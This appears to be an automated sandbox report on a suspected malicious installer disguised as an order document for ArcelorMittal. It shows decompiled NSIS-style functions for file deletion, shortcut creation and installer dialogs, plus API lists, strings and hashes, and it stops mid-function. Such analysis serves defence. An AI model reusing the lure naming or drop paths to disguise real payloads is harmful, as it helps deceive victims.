                                                • Instruction Fuzzy Hash: A3610271A00105ABDF20AF68CD40AAE37A4BF51314F12C17FE953BA2D1D67D8AA1CB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405823 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 808 405823-405849 call 405aee 811 405862-405869 808->811 812 40584b-40585d DeleteFileW 808->812 814 40586b-40586d 811->814 815 40587c-40588c call 406032 811->815 813 4059df-4059e3 812->813 816 405873-405876 814->816 817 40598d-405992 814->817 821 40589b-40589c call 405a32 815->821 822 40588e-405899 lstrcatW 815->822 816->815 816->817 817->813 820 405994-405997 817->820 823 4059a1-4059a9 call 406375 820->823 824 405999-40599f 820->824 825 4058a1-4058a5 821->825 822->825 823->813 832 4059ab-4059bf call 4059e6 call 4057db 823->832 824->813 828 4058b1-4058b7 lstrcatW 825->828 829 4058a7-4058af 825->829 831 4058bc-4058d8 lstrlenW FindFirstFileW 828->831 829->828 829->831 833 405982-405986 831->833 834 4058de-4058e6 831->834 848 4059c1-4059c4 832->848 849 4059d7-4059da call 405191 832->849 833->817 836 405988 833->836 837 405906-40591a call 406032 834->837 838 4058e8-4058f0 834->838 836->817 850 405931-40593c call 4057db 837->850 851 40591c-405924 837->851 841 4058f2-4058fa 838->841 842 405965-405975 FindNextFileW 838->842 841->837 847 4058fc-405904 841->847 842->834 846 40597b-40597c FindClose 842->846 846->833 847->837 847->842 848->824 852 4059c6-4059d5 call 405191 call 405ed3 848->852 849->813 861 40595d-405960 call 405191 850->861 862 40593e-405941 850->862 851->842 853 405926-40592f call 405823 851->853 852->813 853->842 861->842 865 405943-405953 call 405191 call 405ed3 862->865 866 405955-40595b 862->866 865->842 866->842
                                                C-Code - Quality: 98%
                                                			E00405823(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405AEE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406032(0x7a3f48, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405A32(_t68);
					} else {
						lstrcatW(0x7a3f48, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f48,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406032(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E004057DB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405191(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8ac8 =  *0x7a8ac8 + 1;
										} else {
											E00405191(0xfffffff1, _t68);
											E00405ED3(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405823(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x7a3f48 - 0x5c;
					if( *0x7a3f48 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406375(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E004059E6(_t68);
							_t38 = E004057DB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405191(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405191(0xfffffff1, _t68);
							return E00405ED3(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ac8 =  *0x7a8ac8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                0x0040582d
                                                0x00405832
                                                0x0040583b
                                                0x0040583e
                                                0x00405846
                                                0x00405849
                                                0x0040584c
                                                0x00405854
                                                0x00405856
                                                0x00405857
                                                0x00000000
                                                0x00405857
                                                0x00405862
                                                0x00405865
                                                0x00405865
                                                0x00405865
                                                0x00405869
                                                0x0040587c
                                                0x00405883
                                                0x00405888
                                                0x0040588c
                                                0x0040589c
                                                0x0040588e
                                                0x00405894
                                                0x00405894
                                                0x004058a1
                                                0x004058a5
                                                0x004058b1
                                                0x004058b7
                                                0x004058bc
                                                0x004058c2
                                                0x004058cd
                                                0x004058d3
                                                0x004058d5
                                                0x004058d8
                                                0x00405982
                                                0x00405982
                                                0x00405986
                                                0x00405988
                                                0x00405988
                                                0x00405988
                                                0x00405988
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004058de
                                                0x004058de
                                                0x004058de
                                                0x004058e6
                                                0x00405906
                                                0x0040590e
                                                0x00405913
                                                0x0040591a
                                                0x00405935
                                                0x0040593a
                                                0x0040593c
                                                0x00405960
                                                0x0040593e
                                                0x0040593e
                                                0x00405941
                                                0x00405955
                                                0x00405943
                                                0x00405946
                                                0x0040594e
                                                0x0040594e
                                                0x00405941
                                                0x0040591c
                                                0x00405922
                                                0x00405924
                                                0x0040592a
                                                0x0040592a
                                                0x00405924
                                                0x00000000
                                                0x0040591a
                                                0x004058e8
                                                0x004058f0
                                                0x00000000
                                                0x00000000
                                                0x004058f2
                                                0x004058fa
                                                0x00000000
                                                0x00000000
                                                0x004058fc
                                                0x00405904
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405965
                                                0x0040596d
                                                0x00405973
                                                0x00405973
                                                0x0040597c
                                                0x00000000
                                                0x0040597c
                                                0x004058a7
                                                0x004058af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040586b
                                                0x0040586b
                                                0x0040586d
                                                0x0040598d
                                                0x0040598f
                                                0x00405992
                                                0x004059e3
                                                0x004059e3
                                                0x004059e3
                                                0x00405994
                                                0x00405997
                                                0x004059a2
                                                0x004059a7
                                                0x004059a9
                                                0x00000000
                                                0x00000000
                                                0x004059ac
                                                0x004059b8
                                                0x004059bd
                                                0x004059bf
                                                0x00000000
                                                0x004059da
                                                0x004059c1
                                                0x004059c4
                                                0x00000000
                                                0x00000000
                                                0x004059c9
                                                0x00000000
                                                0x004059d0
                                                0x00405999
                                                0x00405999
                                                0x00000000
                                                0x00405999
                                                0x00405873
                                                0x00405876
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405876

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 0040584C
                                                • lstrcatW.KERNEL32(007A3F48,\*.*), ref: 00405894
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 004058B7
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F48,?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058BD
                                                • FindFirstFileW.KERNEL32(007A3F48,?,?,?,0040A014,?,007A3F48,?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058CD
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 0040596D
                                                • FindClose.KERNEL32(00000000), ref: 0040597C
                                                Strings
                                                • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040582C
                                                • H?z, xrefs: 0040587C
                                                • \*.*, xrefs: 0040588E
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405830
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user~1\AppData\Local\Temp\$H?z$\*.*
                                                • API String ID: 2035342205-2937162007
                                                • Opcode ID: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
                                                • Instruction ID: 14cb3427b362c018eba3739e9bf11da3c0c9d0e64928a5d047ed163a808d7245
                                                • Opcode Fuzzy Hash: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
                                                • Instruction Fuzzy Hash: 5441C271800A14FACB21AB658C89BAF7778EF42724F24817BF801B11D1D77C4995DEAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406375 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00406375(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f90); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f90;
			}




                                                0x00406380
                                                0x00406389
                                                0x00000000
                                                0x00406396
                                                0x0040638c
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(772EFAA0,007A4F90,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00405B37,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\), ref: 00406380
                                                • FindClose.KERNEL32(00000000), ref: 0040638C
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp, xrefs: 00406375
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 2295610775-1732896309
                                                • Opcode ID: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
                                                • Instruction ID: 3fb5690f441cb67cce8948cff85e4bd0b52f5f4d7afbd4cfaa78c2f4b78b622c
                                                • Opcode Fuzzy Hash: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
                                                • Instruction Fuzzy Hash: BAD013715151205FC2505F746E0C44777545F463313154F35F45AF11E0C7745C5645EC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E00402095() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x34)) = E00402BBF(0xfffffff0);
				 *((intOrPtr*)(_t107 - 8)) = E00402BBF(0xffffffdf);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402BBF(2);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402BBF(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0x10)) = E00402BBF(0x45);
				_t52 =  *(_t107 - 0x1c);
				 *(_t107 - 0x40) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405A5D( *((intOrPtr*)(_t107 - 8))) == 0) {
					E00402BBF(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x40849c, _t83, 1, 0x40848c, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ac, _t107 - 0x48);
					 *((intOrPtr*)(_t107 - 0x14)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 8)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x3c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x40));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 0xc)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0x10)));
						if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x48));
							 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x34)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x48));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                0x0040209e
                                                0x004020a8
                                                0x004020b2
                                                0x004020bc
                                                0x004020c7
                                                0x004020ca
                                                0x004020e4
                                                0x004020e7
                                                0x004020ed
                                                0x004020f0
                                                0x004020fa
                                                0x004020fe
                                                0x004020fe
                                                0x00402103
                                                0x00402114
                                                0x0040211c
                                                0x004021d3
                                                0x004021d3
                                                0x004021da
                                                0x00402122
                                                0x00402122
                                                0x00402131
                                                0x00402135
                                                0x00402138
                                                0x0040213e
                                                0x0040214c
                                                0x0040214f
                                                0x00402151
                                                0x0040215c
                                                0x0040215c
                                                0x00402161
                                                0x00402163
                                                0x0040216a
                                                0x0040216a
                                                0x0040216d
                                                0x00402176
                                                0x00402179
                                                0x0040217f
                                                0x00402181
                                                0x0040218b
                                                0x0040218b
                                                0x0040218e
                                                0x00402197
                                                0x0040219a
                                                0x004021a3
                                                0x004021a9
                                                0x004021ab
                                                0x004021b9
                                                0x004021b9
                                                0x004021bc
                                                0x004021c2
                                                0x004021c2
                                                0x004021c5
                                                0x004021cb
                                                0x004021d1
                                                0x004021e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004021d1
                                                0x004021dc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00402154
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
                                                • API String ID: 542301482-2561518016
                                                • Opcode ID: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
                                                • Instruction ID: d47fca260cdd8e4185df19bb7459501af9c1372a1639466ce8116fcd6c853d94
                                                • Opcode Fuzzy Hash: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
                                                • Instruction Fuzzy Hash: 2D414C71A00209AFCF00DFA4CD88AAD7BB5FF48314B20456AF515EB2D1DBB99A41CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403C1E Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403c1e-403c30 302 403d71-403d80 301->302 303 403c36-403c3c 301->303 305 403d82-403dbd GetDlgItem * 2 call 4040f6 KiUserCallbackDispatcher call 40140b 302->305 306 403dcf-403de4 302->306 303->302 304 403c42-403c4b 303->304 307 403c60-403c63 304->307 308 403c4d-403c5a SetWindowPos 304->308 328 403dc2-403dca 305->328 310 403e24-403e29 call 404142 306->310 311 403de6-403de9 306->311 313 403c65-403c77 ShowWindow 307->313 314 403c7d-403c83 307->314 308->307 318 403e2e-403e49 310->318 316 403deb-403df6 call 401389 311->316 317 403e1c-403e1e 311->317 313->314 319 403c85-403c9a DestroyWindow 314->319 320 403c9f-403ca2 314->320 316->317 338 403df8-403e17 SendMessageW 316->338 317->310 323 4040c3 317->323 324 403e52-403e58 318->324 325 403e4b-403e4d call 40140b 318->325 327 4040a0-4040a6 319->327 329 403ca4-403cb0 SetWindowLongW 320->329 330 403cb5-403cbb 320->330 326 4040c5-4040cc 323->326 334 404081-40409a DestroyWindow EndDialog 324->334 335 403e5e-403e69 324->335 325->324 327->323 332 4040a8-4040ae 327->332 328->306 329->326 336 403cc1-403cd2 GetDlgItem 330->336 337 403d5e-403d6c call 40415d 330->337 332->323 340 4040b0-4040b9 ShowWindow 332->340 334->327 335->334 341 403e6f-403ebc call 406054 call 4040f6 * 3 GetDlgItem 335->341 342 403cf1-403cf4 336->342 343 403cd4-403ceb SendMessageW IsWindowEnabled 336->343 337->326 338->326 340->323 371 403ec6-403f02 ShowWindow KiUserCallbackDispatcher call 404118 EnableWindow 341->371 372 403ebe-403ec3 341->372 346 403cf6-403cf7 342->346 347 403cf9-403cfc 342->347 343->323 343->342 349 403d27-403d2c call 4040cf 346->349 350 403d0a-403d0f 347->350 351 403cfe-403d04 347->351 349->337 352 403d45-403d58 SendMessageW 350->352 354 403d11-403d17 350->354 351->352 353 403d06-403d08 351->353 352->337 353->349 357 403d19-403d1f call 40140b 354->357 358 403d2e-403d37 call 40140b 354->358 367 403d25 357->367 358->337 368 403d39-403d43 358->368 367->349 368->367 375 403f04-403f05 371->375 376 403f07 371->376 372->371 377 403f09-403f37 GetSystemMenu EnableMenuItem SendMessageW 375->377 376->377 378 403f39-403f4a SendMessageW 377->378 379 403f4c 377->379 380 403f52-403f90 call 40412b call 406032 lstrlenW call 406054 SetWindowTextW call 401389 378->380 379->380 380->318 389 403f96-403f98 380->389 389->318 390 403f9e-403fa2 389->390 391 403fc1-403fd5 DestroyWindow 390->391 392 403fa4-403faa 390->392 391->327 394 403fdb-404008 CreateDialogParamW 391->394 392->323 393 403fb0-403fb6 392->393 393->318 395 403fbc 393->395 394->327 396 40400e-404065 call 4040f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 394->396 395->323 396->323 401 404067-40407a ShowWindow call 404142 396->401 403 40407f 401->403 403->327
                                                C-Code - Quality: 84%
                                                			E00403C1E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;
				void* _t144;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x7a1f28 = _t37;
					if(_t117 == 0x110) {
						 *0x7a8a48 = _t127;
						 *0x7a1f3c = GetDlgItem(_t127, 1);
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff08 = _t93;
						E004040F6(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a28); // executed
						 *0x7a7a0c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x7a1f28 = 1;
					}
					_t124 =  *0x40a388; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x7a8a60;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E00404142(0x40b);
						while(1) {
							_t39 =  *0x7a1f28;
							 *0x40a388 =  *0x40a388 + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a388; // 0x0
							__eflags = _t41 -  *0x7a8a64;
							if(_t41 ==  *0x7a8a64) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a0c - _t135; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a388 -  *0x7a8a64; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E00406054(_t118, _t127, _t132, 0x7b8000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E004040F6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E004040F6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E004040F6(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8acc - _t135;
							_v32 = _t51;
							if( *0x7a8acc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
